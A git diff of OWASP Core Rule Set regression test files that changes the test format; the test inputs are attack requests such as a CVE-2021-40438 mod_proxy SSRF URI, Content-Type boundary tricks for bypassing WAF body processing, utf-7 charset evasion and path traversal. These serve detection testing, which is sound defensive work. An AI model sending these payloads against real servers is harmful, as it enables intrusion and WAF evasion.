a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml @@ -2,36 +2,35 @@ meta: author: "Franziska Bühler, azurit" description: "Rule against CVE-2021-40438" - enabled: true - name: 921240.yaml +rule_id: 921240 tests: - - test_title: 921240-1 + - test_id: 1 desc: "Detect attacks against mod_proxy: CVE-2021-40438" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/?unix:AAAAAAAAA|http://coreruleset.org/" - version: "HTTP/1.1" - output: - log_contains: id "921240" - - test_title: 921240-2 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/?unix:AAAAAAAAA|http://coreruleset.org/" + version: "HTTP/1.1" + output: + log: + expect_ids: [921240] + - test_id: 2 desc: "Detect attacks against mod_proxy: CVE-2021-40438, URI encoded" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/?unix%3AAAAAAAAAA|http://coreruleset.org/" - version: "HTTP/1.1" - output: - log_contains: id "921240" + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/?unix%3AAAAAAAAAA|http://coreruleset.org/" + version: "HTTP/1.1" + output: + log: + expect_ids: [921240] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml index de34bd0f5..060b8d368 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml @@ -2,198 +2,197 @@ meta: author: "studersi, azurit" description: Test whether the recommended rules can be fooled into using the wrong body processor which can result in bypasses - enabled: true - name: 921421.yaml +rule_id: 921421 tests: - - test_title: 921421-1 + - test_id: 1 desc: Bypass targeting recommended rules (rule 200000) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/json" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921421" - - test_title: 921421-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/json" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921421] + - test_id: 2 desc: Bypass targeting recommended rules (rule 200006) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/vnd.mycompany.myapp.customer-v2+json" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921421" - - test_title: 921421-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/vnd.mycompany.myapp.customer-v2+json" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921421] + - test_id: 3 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="text/xml" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921421" - - test_title: 921421-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="text/xml" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921421] + - test_id: 4 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/xml" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921421" - - test_title: 921421-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/xml" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921421] + - test_id: 5 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/soap+xml" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921421" - - test_title: 921421-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/soap+xml" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921421] + - test_id: 6 desc: Negative test for 921421-1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" - - test_title: 921421-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921421] + - test_id: 7 desc: Negative test for 921421-2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/vnd.mycompany.myapp.customer-v2+json - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" - - test_title: 921421-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/vnd.mycompany.myapp.customer-v2+json + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921421] + - test_id: 8 desc: Negative test for 921421-3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: text/xml - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" - - test_title: 921421-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: text/xml + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921421] + - test_id: 9 desc: Negative test for 921421-4 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" - - test_title: 921421-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921421] + - test_id: 10 desc: Negative test for 921421-5 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/soap+xml - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" - - test_title: 921421-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/soap+xml + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921421] + - test_id: 11 desc: Negative test for rule 921421-6 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: text/html; charset=UTF-8 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" - - test_title: 921421-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: text/html; charset=UTF-8 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921421] + - test_id: 12 desc: Negative test for rule 921421-7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=something - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=something + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921421] diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml index c215da6b9..e5b83d50b 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml @@ -2,278 +2,277 @@ meta: author: "studersi, azurit" description: Try to send mime types in different part of Content-Type header - enabled: true - name: 921422.yaml +rule_id: 921422 tests: - - test_title: 921422-1 + - test_id: 1 desc: Bypass targeting recommended rules (rule 200000) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/json" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/json" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921422] + - test_id: 2 desc: Bypass targeting recommended rules (rule 200006) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/vnd.mycompany.myapp.customer-v2+json" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/vnd.mycompany.myapp.customer-v2+json" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921422] + - test_id: 3 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="text/xml" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="text/xml" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921422] + - test_id: 4 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/xml" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/xml" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921422] + - test_id: 5 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="multipart/related" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="multipart/related" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921422] + - test_id: 6 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="text/html" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="text/html" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921422] + - test_id: 7 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="image/jpeg" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="image/jpeg" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921422] + - test_id: 8 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="foobar/foobar" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="foobar/foobar" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [921422] + - test_id: 9 desc: Negative test for 921422-1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921422] + - test_id: 10 desc: Negative test for 921422-2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/vnd.mycompany.myapp.customer-v2+json - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/vnd.mycompany.myapp.customer-v2+json + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921422] + - test_id: 11 desc: Negative test for 921422-3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: text/xml - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: text/xml + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921422] + - test_id: 12 desc: Negative test for 921422-4 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921422] + - test_id: 13 desc: Negative test for 921422-5 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/soap+xml - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/soap+xml + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921422] + - test_id: 14 desc: Negative test for 921422-6 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: text/html - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: text/html + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921422] + - test_id: 15 desc: Negative test for rule 921422-7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: text/html; charset=UTF-8 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: text/html; charset=UTF-8 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921422] + - test_id: 16 desc: Negative test for rule 921422-8 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=something - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=something + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921422] + - test_id: 17 desc: Negative test for rule 921422-9 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=----webkitformboundary12w4lszoxn26vnd - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=----webkitformboundary12w4lszoxn26vnd + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [921422] diff --git a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml index f1eeae421..710fae5c3 100644 --- a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml +++ b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml @@ -2,90 +2,89 @@ meta: author: "Felipe Zipitria, Max Leske" description: Test Multipart/form-data - enabled: true - name: 922100.yaml +rule_id: 922100 tests: - - test_title: 922100-1 + - test_id: 1 desc: "Positive test: utf-7 is not in allowed charsets" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-disposition: form-data; name="_charset_" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-disposition: form-data; name="_charset_" - utf-7 - --boundary - Content-disposition: form-data; name="positive" - Content-Type: text/plain + utf-7 + --boundary + Content-disposition: form-data; name="positive" + Content-Type: text/plain - Let me see if I can use utf-7. - --boundary-- - output: - log_contains: id "922100" - - test_title: 922100-2 + Let me see if I can use utf-7. + --boundary-- + output: + log: + expect_ids: [922100] + - test_id: 2 desc: "Negative test: only allowed charsets when using _charset_" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-disposition: form-data; name="_charset_" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-disposition: form-data; name="_charset_" - utf-8 - --boundary - Content-disposition: form-data; name="negative" - Content-Type: text/plain + utf-8 + --boundary + Content-disposition: form-data; name="negative" + Content-Type: text/plain - This should be good as we use utf-8 that is allowed. - --boundary-- - output: - no_log_contains: id "922100" - - test_title: 922100-3 + This should be good as we use utf-8 that is allowed. + --boundary-- + output: + log: + no_expect_ids: [922100] + - test_id: 3 desc: "Positive test: don't allow substrings of valid charsets when using _charset_" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-disposition: form-data; name="_charset_" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-disposition: form-data; name="_charset_" - utf- - --boundary - Content-disposition: form-data; name="negative" - Content-Type: text/plain + utf- + --boundary + Content-disposition: form-data; name="negative" + Content-Type: text/plain - utf-8 is valid but utf- should not be. - --boundary-- - output: - log_contains: id "922100" + utf-8 is valid but utf- should not be. + --boundary-- + output: + log: + expect_ids: [922100] diff --git a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml index 72e8f269b..90b479f2f 100644 --- a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml +++ b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml @@ -2,62 +2,61 @@ meta: author: "Felipe Zipitria" description: Test Multipart/form-data - enabled: true - name: 922110.yaml +rule_id: 922110 tests: - - test_title: 922110-1 + - test_id: 1 desc: "Positive test: utf-7 is not in allowed charsets" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-disposition: form-data; name="_charset_" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-disposition: form-data; name="_charset_" - utf-8 - --boundary - Content-disposition: form-data; name="922110" - Content-Type: text/plain; charset=utf-7 + utf-8 + --boundary + Content-disposition: form-data; name="922110" + Content-Type: text/plain; charset=utf-7 - Knock knock. - --boundary-- - output: - log_contains: id "922110" - - test_title: 922110-2 + Knock knock. + --boundary-- + output: + log: + expect_ids: [922110] + - test_id: 2 desc: "Negative test: utf-8 is allowed" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-disposition: form-data; name="_charset_" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-disposition: form-data; name="_charset_" - utf-8 - --boundary - Content-disposition: form-data; name="negative" - Content-Type: text/plain; charset=utf-8 + utf-8 + --boundary + Content-disposition: form-data; name="negative" + Content-Type: text/plain; charset=utf-8 - I shold be allowed to get in. - --boundary-- - output: - no_log_contains: id "922110" + I shold be allowed to get in. + --boundary-- + output: + log: + no_expect_ids: [922110] diff --git a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml index 71e447a6f..fe49ae15b 100644 --- a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml +++ b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml @@ -2,55 +2,54 @@ meta: author: "Felipe Zipitria" description: Test Multipart/form-data - enabled: true - name: 922120.yaml +rule_id: 922120 tests: - - test_title: 922120-1 + - test_id: 1 desc: "Positive test: utf-7 is not in allowed charsets" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-Disposition: form-data; name="flavors" - Content-Transfer-Encoding: 8bit - Content-Type: text/plain; charset=utf-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-Disposition: form-data; name="flavors" + Content-Transfer-Encoding: 8bit + Content-Type: text/plain; charset=utf-7 - Pineapple. Pizza. - --boundary-- - output: - log_contains: id "922120" - - test_title: 922120-2 + Pineapple. Pizza. + --boundary-- + output: + log: + expect_ids: [922120] + - test_id: 2 desc: "Negative test: no content-transfer-encoding header should be good" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-disposition: form-data; name="negative" - Content-Type: text/plain + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-disposition: form-data; name="negative" + Content-Type: text/plain - This should be good as there is no content-transfer-encoding header. - --boundary-- - output: - no_log_contains: id "922120" + This should be good as there is no content-transfer-encoding header. + --boundary-- + output: + log: + no_expect_ids: [922120] diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml index 276aa07f9..d9a96df21 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930100.yaml @@ -1,73 +1,72 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - enabled: true - name: "930100.yaml" description: "Application attack LFI" +rule_id: 930100 tests: - - test_title: 930100-1 + - test_id: 1 desc: "Path Traversal Attack (/../) encoded" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - FoobarHeader: "0x5c0x2e.%00/" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930100" - - test_title: 930100-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + FoobarHeader: "0x5c0x2e.%00/" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930100] + - test_id: 2 desc: "Path Traversal Attack Triple Dot (/.../)" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - 